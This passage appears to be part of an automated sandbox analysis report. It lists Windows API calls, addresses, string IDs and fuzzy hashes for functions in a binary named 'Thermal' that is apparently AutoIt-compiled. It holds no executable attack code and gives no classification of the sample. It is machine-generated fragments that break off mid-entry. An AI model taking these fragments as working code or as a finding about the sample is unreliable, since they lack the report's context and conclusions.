                                                • LineTo.GDI32(00000000,00000003,?), ref: 007FC590
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC59E
                                                • LineTo.GDI32(00000000,00000000,?), ref: 007FC5AE
                                                • EndPath.GDI32(00000000), ref: 007FC5BE
                                                • StrokePath.GDI32(00000000), ref: 007FC5CE
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D59B4
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D59CA
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007D59D9
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59E8
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F2
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F9
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
                                                • Instruction ID: 8cca1c44bc0954c9463effe5e77c7d859c70f214c4c79512ce4e1636cc8b6a3a
                                                • Opcode Fuzzy Hash: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
                                                • Instruction Fuzzy Hash: A0F03032641258BBE7615B929C0DFEF7B7CFFC6B11F00015AFA15D1150DBB11A118AB5
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 007D77FE
                                                • EnterCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D780F
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,0077C2B6,?,?), ref: 007D781C
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0077C2B6,?,?), ref: 007D7829
                                                  • Part of subcall function 007D71F0: CloseHandle.KERNEL32(00000000,?,007D7836,?,0077C2B6,?,?), ref: 007D71FA
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D783C
                                                • LeaveCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D7843
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
                                                • Instruction ID: 5476ae84883a2dd1592a93d0c049a950f638cd62aebcda84c0a9300ec2875e43
                                                • Opcode Fuzzy Hash: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
                                                • Instruction Fuzzy Hash: A0F05832945212AFD7962B64EC8DBAB773AFF49302F151422F202A51B1DBB95801DF60
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C9555
                                                • UnloadUserProfile.USERENV(?,?), ref: 007C9561
                                                • CloseHandle.KERNEL32(?), ref: 007C956A
                                                • CloseHandle.KERNEL32(?), ref: 007C9572
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 007C957B
                                                • HeapFree.KERNEL32(00000000), ref: 007C9582
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
                                                • Instruction ID: 1c18c533840e45a4d1678bc5e08cf5ee2995cca8ce08a7efe82ba71e3cbb5aa3
                                                • Opcode Fuzzy Hash: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
                                                • Instruction Fuzzy Hash: EEE0E536104101BBDB821FE1EC0CA5ABF39FF49722F104220F21981170CB32A460DF90
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E8CFD
                                                • CharUpperBuffW.USER32(?,?), ref: 007E8E0C
                                                • VariantClear.OLEAUT32(?), ref: 007E8F84
                                                  • Part of subcall function 007D7B1D: VariantInit.OLEAUT32(00000000), ref: 007D7B5D
                                                  • Part of subcall function 007D7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 007D7B66
                                                  • Part of subcall function 007D7B1D: VariantClear.OLEAUT32(00000000), ref: 007D7B72
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: b55a5caec94e8e0ce67f7c3e5a246af0699c5aaa042886d72f4d991a33d5373f
                                                • Instruction ID: 17837e38d7c7b29e99e7ea490574ea1593b22796bdacbab3e7e1fefceafb1e5f
                                                • Opcode Fuzzy Hash: b55a5caec94e8e0ce67f7c3e5a246af0699c5aaa042886d72f4d991a33d5373f
                                                • Instruction Fuzzy Hash: 7A919C70604341DFCB50DF25C88495ABBF5EF89354F04896EF89A8B3A2DB35E905CB92
                                                APIs
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                • _memset.LIBCMT ref: 007D332E
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D335D
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D3410
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D343E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: f3e6debc06dea333ad3a22036d6ac5b23695f5cc0f627589661313c59dfdb08b
                                                • Instruction ID: 7eec3bb623d783c658b319bd703807979a610ce5aa2e01080a28998a698e7f32
                                                • Opcode Fuzzy Hash: f3e6debc06dea333ad3a22036d6ac5b23695f5cc0f627589661313c59dfdb08b
                                                • Instruction Fuzzy Hash: DF51CF716083419BD725AB28D94567BB7F8AF45320F040A2EF895E3291DB7CDA44CB93
                                                APIs
                                                • _memset.LIBCMT ref: 007D2F67
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D2F83
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 007D2FC9
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00837890,00000000), ref: 007D3012
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
                                                • Instruction ID: 560110a9e3c82988b890104215af3ea2ce8989b882a7ffd778fd1fd826698a15
                                                • Opcode Fuzzy Hash: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
                                                • Instruction Fuzzy Hash: 01418071208341DFD720DF24C888B5ABBF9AF84310F144A1EF5A5A7392D778EA06CB52
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C9ACC
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C9ADF
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 007C9B0F
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                • Opcode ID: 24f7d795f10f0f13d2818e76e9d309e50a172b9dfe6833cf912a3ae76bff7a72
                                                • Instruction ID: 3d8222e7b898e7b39d448a323faacdc9df7e92e0089937b178d7b4026c9e320b
                                                • Opcode Fuzzy Hash: 24f7d795f10f0f13d2818e76e9d309e50a172b9dfe6833cf912a3ae76bff7a72
                                                • Instruction Fuzzy Hash: 9721F0B1940104BEDB58ABA0EC4AEFEBB6DEF51360F50421DF925932D0DE3D4D0A9B20
                                                APIs
                                                  • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                  • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                  • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6A86
                                                • LoadLibraryW.KERNEL32(?), ref: 007F6A8D
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F6AA2
                                                • DestroyWindow.USER32(?), ref: 007F6AAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
                                                • Instruction ID: d44a591fbaa8a545450d22c2d4ff12bb8621d1a68fe3dd3a4e0932d43a4ff14c
                                                • Opcode Fuzzy Hash: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
                                                • Instruction Fuzzy Hash: 57218B71200209AFEF108E689C81EBB77A9FB59324F10C619FB50A2290D739DC51AB60
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D7377
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D73AA
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D73BC
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D73F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
                                                • Instruction ID: 243fccf0defaad787e1ff41312ee3b095f6cb118e2383de91fe6fe1aa892f7fe
                                                • Opcode Fuzzy Hash: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
                                                • Instruction Fuzzy Hash: 7421607150834AABDB249F69DC49A9A7BB4BF44720F204A1AFCA1D73E0E774D850DB90
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D7444
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D7476
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D7487
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D74C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
                                                • Instruction ID: 722adb2c05bd204612e3f505865db5f1451be7dcce47383874bf3877fedad77f
                                                • Opcode Fuzzy Hash: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
                                                • Instruction Fuzzy Hash: 9821C1316083469BDB259F689C49E9A7BB8BF45730F200B0AFDA0D73D0EB749840CB50
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB297
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DB2EB
                                                • __swprintf.LIBCMT ref: 007DB304
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00800980), ref: 007DB342
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
                                                • Instruction ID: 9de5a25b85a3a5f66c640d987f3ac263227b450c41b8531175a767f5fa29de47
                                                • Opcode Fuzzy Hash: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
                                                • Instruction Fuzzy Hash: 3C214C34A00108EFCB10DFA5C849EAEB7B8EF89704B108069F909D7352DB35AA45DB61
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                  • Part of subcall function 007CAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
                                                  • Part of subcall function 007CAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
                                                  • Part of subcall function 007CAA52: GetCurrentThreadId.KERNEL32 ref: 007CAA89
                                                  • Part of subcall function 007CAA52: AttachThreadInput.USER32(00000000), ref: 007CAA90
                                                • GetFocus.USER32 ref: 007CAC2A
                                                  • Part of subcall function 007CAA9B: GetParent.USER32(?), ref: 007CAAA9
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CAC73
                                                • EnumChildWindows.USER32(?,007CACEB), ref: 007CAC9B
                                                • __swprintf.LIBCMT ref: 007CACB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                • String ID: %s%d
                                                • API String ID: 1941087503-1110647743
                                                • Opcode ID: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
                                                • Instruction ID: d6bb4337a87dce2e43770e843b7b62ce1dae7f9623f94833ec9673dec45b823f
                                                • Opcode Fuzzy Hash: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
                                                • Instruction Fuzzy Hash: DA11CD75600208BBDF11BFA09D8AFAA376CAB44315F0080ADFE18AA182CA7959459B71
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007D2318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                • API String ID: 3964851224-769500911
                                                • Opcode ID: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
                                                • Instruction ID: 9e6b0eafa10e2464658ebe5f0265e469944919d7d19ac5f0d6303183ace31c69
                                                • Opcode Fuzzy Hash: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
                                                • Instruction Fuzzy Hash: 75117C30A10128DFCF04EFA4E8504EEB3B8FF25304B508069D814A7352EB3A5D5BCB90
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EF2F0
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EF320
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EF453
                                                • CloseHandle.KERNEL32(?), ref: 007EF4D4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
                                                • Instruction ID: 1569494d1650a4e1dd342d5c0a5046135efb8eac11458d9866dead4932646c42
                                                • Opcode Fuzzy Hash: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
                                                • Instruction Fuzzy Hash: D1816071604700DFDB20EF29D886F2AB7E5AF48750F14891DFA99DB2D2D7B4AC408B91
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F075D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F079C
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F07E3
                                                • RegCloseKey.ADVAPI32(?,?), ref: 007F080F
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F081C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
                                                • Instruction ID: 2b28f44246df45dfb5ab319df07ab67beb04705bf26f21b3e8c4404ba95fbe12
                                                • Opcode Fuzzy Hash: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
                                                • Instruction Fuzzy Hash: CB513A71208208EFD714EF64C885F7AB7E9BF84314F44891DF59587292DB38E905CBA2
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DEC62
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DEC8B
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DECCA
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DECEF
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DECF7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
